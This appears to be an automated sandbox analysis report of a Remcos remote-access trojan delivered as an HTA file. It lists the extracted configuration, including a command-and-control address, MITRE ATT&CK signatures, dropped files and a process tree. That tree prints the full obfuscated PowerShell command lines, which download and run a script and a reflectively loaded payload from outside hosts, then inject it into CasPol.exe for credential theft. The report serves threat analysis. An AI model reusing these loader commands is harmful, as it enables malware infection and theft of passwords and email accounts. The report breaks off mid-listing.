remcos | eae0a340faa2c93a9f0829ac6a1d1ea7323089f3eb5f3966153b1e4967e631e6

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
07-02-2025 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

niceskillwithbetterservicegoodgirlmylover.hta
Size

14KB
MD5

59123cec8e9618aeaa7236be2489518f
SHA1

43d7d2d922d19407897165e0d30644a8fa409623
SHA256

eae0a340faa2c93a9f0829ac6a1d1ea7323089f3eb5f3966153b1e4967e631e6
SHA512

427e7392bc9cd679d0e25a34f9e48f9696556208dd945f0d418f0a06d41106a3eae2c009eaccfe706ea237d15521c81cb99008c1d173578355e47226b448b99e
SSDEEP

48:3au7yrUM7CCrUXkEkgozHc699DdDfbyy1bUB0a0su7+7DaWrUh7LG:quygcCCgPRadfZfGy1m0a0R+Lg96

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

172.245.123.12:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-M39SJI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/944-110-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1764-108-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/184-107-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1764-108-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/184-107-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
24	4568	powershell.exe
27	1580	powershell.exe
28	1580	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4568	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1580	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1580 set thread context of 3252	1580	powershell.exe	103
PID 3252 set thread context of 184	3252	CasPol.exe	105
PID 3252 set thread context of 1764	3252	CasPol.exe	106
PID 3252 set thread context of 944	3252	CasPol.exe	107

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4568	powershell.exe
4568	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
184	CasPol.exe
184	CasPol.exe
944	CasPol.exe
944	CasPol.exe
184	CasPol.exe
184	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3252	CasPol.exe
3252	CasPol.exe
3252	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	944	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3252	CasPol.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 4872	5060	mshta.exe	85
PID 5060 wrote to memory of 4872	5060	mshta.exe	85
PID 5060 wrote to memory of 4872	5060	mshta.exe	85
PID 4872 wrote to memory of 4568	4872	cmd.exe	88
PID 4872 wrote to memory of 4568	4872	cmd.exe	88
PID 4872 wrote to memory of 4568	4872	cmd.exe	88
PID 4568 wrote to memory of 1964	4568	powershell.exe	90
PID 4568 wrote to memory of 1964	4568	powershell.exe	90
PID 4568 wrote to memory of 1964	4568	powershell.exe	90
PID 1964 wrote to memory of 3128	1964	csc.exe	91
PID 1964 wrote to memory of 3128	1964	csc.exe	91
PID 1964 wrote to memory of 3128	1964	csc.exe	91
PID 4568 wrote to memory of 1080	4568	powershell.exe	97
PID 4568 wrote to memory of 1080	4568	powershell.exe	97
PID 4568 wrote to memory of 1080	4568	powershell.exe	97
PID 1080 wrote to memory of 1580	1080	WScript.exe	98
PID 1080 wrote to memory of 1580	1080	WScript.exe	98
PID 1080 wrote to memory of 1580	1080	WScript.exe	98
PID 1580 wrote to memory of 2220	1580	powershell.exe	101
PID 1580 wrote to memory of 2220	1580	powershell.exe	101
PID 1580 wrote to memory of 2220	1580	powershell.exe	101
PID 1580 wrote to memory of 4172	1580	powershell.exe	102
PID 1580 wrote to memory of 4172	1580	powershell.exe	102
PID 1580 wrote to memory of 4172	1580	powershell.exe	102
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 1580 wrote to memory of 3252	1580	powershell.exe	103
PID 3252 wrote to memory of 184	3252	CasPol.exe	105
PID 3252 wrote to memory of 184	3252	CasPol.exe	105
PID 3252 wrote to memory of 184	3252	CasPol.exe	105
PID 3252 wrote to memory of 184	3252	CasPol.exe	105
PID 3252 wrote to memory of 1764	3252	CasPol.exe	106
PID 3252 wrote to memory of 1764	3252	CasPol.exe	106
PID 3252 wrote to memory of 1764	3252	CasPol.exe	106
PID 3252 wrote to memory of 1764	3252	CasPol.exe	106
PID 3252 wrote to memory of 944	3252	CasPol.exe	107
PID 3252 wrote to memory of 944	3252	CasPol.exe	107
PID 3252 wrote to memory of 944	3252	CasPol.exe	107
PID 3252 wrote to memory of 944	3252	CasPol.exe	107

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceskillwithbetterservicegoodgirlmylover.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvwk3bra\rvwk3bra.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1964
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp" "c:\Users\Admin\AppData\Local\Temp\rvwk3bra\CSCB421AB536A634203A3C1DB9CE0A619.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3128
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceskillwithbetterservicegoodgirlmyloveregoo.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcgBlAHYAbwBsAHkAbQBsAHIAaQBnAGQAbwBvAGcAZQBjAGkAdgByAGUAcwByAGUAdAB0AGUAYgBoAHQAaQB3AGwAbABpAGsAcwBlAGMAaQBuAC8AMAA3ADcALwA2ADgALgAzADIAMQAuADUANAAyAC4AMgA3ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1580
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:2220
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:4172
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3252
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zadszjaqctzjpk"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:184
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\buiczblkqbrozqrtu"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mwvvauwlejjbbxnxdaop"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
b180dbda70ecfdd0d260939ad19d050e

SHA1
4f43072cc53b7a395ddc223fbf8cf4bc86c1e505

SHA256
973ddf3e6ccb2cad4bfe522084a866902e9d7b2e7873e04c6ee84d587995a90d

SHA512
bc60aecca2a5733dca0d685c4a0684a845bf02f2479b864cb65fb18521e2a4bbed37d0164a7ff82473eb64ccba09c18bb8535c1fd0ca16d52aa4a800d38ebb5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
8568dc2d098f506afcca93f32728bc70

SHA1
2623f26880bbe836b4a0bcf4010c05291b4cfc8e

SHA256
fe89e03757f32e1f54a31897c43e5cb4ae8b19d9141b53aa7e92d7f8cca954d2

SHA512
baffadb1f46059858100defee50cd87f76c9cf7f69f39639bfb4d29162db4b3bfd8e59e385e58b5796177e5a66f145b64d98f010473461d48aea508a2d1a1c1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp

Filesize
1KB

MD5
fb11a15d1a9ee75c8b2cd89dc4924f8f

SHA1
369eb5da2ddfa727d4519f7c35078d7b95141af3

SHA256
13e035f7d7b94e5371ca851e859bf5233a2a31b136c8e9c3a530c3956170d858

SHA512
11ca237530718d323429a04732a7bd1c2b7d6feb3cd9ba2ecbb01d529b67c18b65d9f285c5f942e19cf99dbee463839d7fec4166ae0ae2938629ab6c6444cee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1dl010kf.kuo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rvwk3bra\rvwk3bra.dll

Filesize
3KB

MD5
b7330f6297d8ed5f2cb1a66c9241e4e6

SHA1
604e1e67acda19c6d7dbc2808bb5f5d922e69b17

SHA256
f0202bc1224c698052abdeb499faeb5a94a1f080228f77af56b05ec94a11789c

SHA512
9b88fcbcdc914199828a326e3270b0d7a8ba7907bb87d81aa6526c84a9aaeed1a929b843e993d59b8a56394eca2b45db5076f506391ee79459369fc81f1d34c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\zadszjaqctzjpk

Filesize
4KB

MD5
602636ec0f565fc073f965104c453062

SHA1
4269ce342b8169d50b831ba03216919555325717

SHA256
8e25d991be4c241761f66f71b429a82ea6929993f97637a01a219343507749f8

SHA512
052e6f385c75d082653e5c4929b0eb9e443e03775f0e1d0e52e64b44534548403ffd0da39975acfe975e30f9c22b1956cc0b808d109b3b681d9331b82e566c10

Download Submit
C:\Users\Admin\AppData\Roaming\niceskillwithbetterservicegoodgirlmyloveregoo.vbs

Filesize
189KB

MD5
e46a3153fbce8c6b616865a299f84b0f

SHA1
68d8ab3028dcc62397119843f95866b04940e1ce

SHA256
15c6eaf3a7debf24c49a4609b6a2c3c9ad2632b39fa8570766a5df077c12009b

SHA512
c67f63ec7046578cd525408b17f05bacf614b72f4bc3d60bd6b14b37b17b7b587a48f83c5d669f0aaafc2c2dca382268e39b4e145de28b7967e1a22e28e8bc0c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvwk3bra\CSCB421AB536A634203A3C1DB9CE0A619.TMP

Filesize
652B

MD5
2cbbadbcd38bb6db60aefb004207305c

SHA1
463779c219245a67325979820166e715500cd017

SHA256
adf95611af16a68b0021a86c5c121feb1b667a5388932fdb4f417ea02a3a8097

SHA512
e76f8a9b75f18d31d1b4f87726f4d5f478720ac09f059799a10ddc1a1df8c9463c05ff981f586a016bbd38d8d20a5f680cd008cd887a92b951941b5f7362e2d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvwk3bra\rvwk3bra.0.cs

Filesize
489B

MD5
06ce6df8c264b461dcdeef00df36b8de

SHA1
050df9c041ebca4c7e6cf8febddcb80e95f55769

SHA256
ab829027e3a474c684b12b0abce9ef3601a2695b3ddd6d5b699e7df0482b2e28

SHA512
03a1d3e658866433b928601123c1ae3cf89262661b9143a0eadb5a99c27ed45eb2d3aef17461c1e5b2e60ddad024378cd99786be101371aa09e4122d0bf9be6f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvwk3bra\rvwk3bra.cmdline

Filesize
369B

MD5
bf81eb86f67c839ccfaa8aa68f9e7f60

SHA1
6219fd8914f27caf5b1696de9b63c9b39be0fc57

SHA256
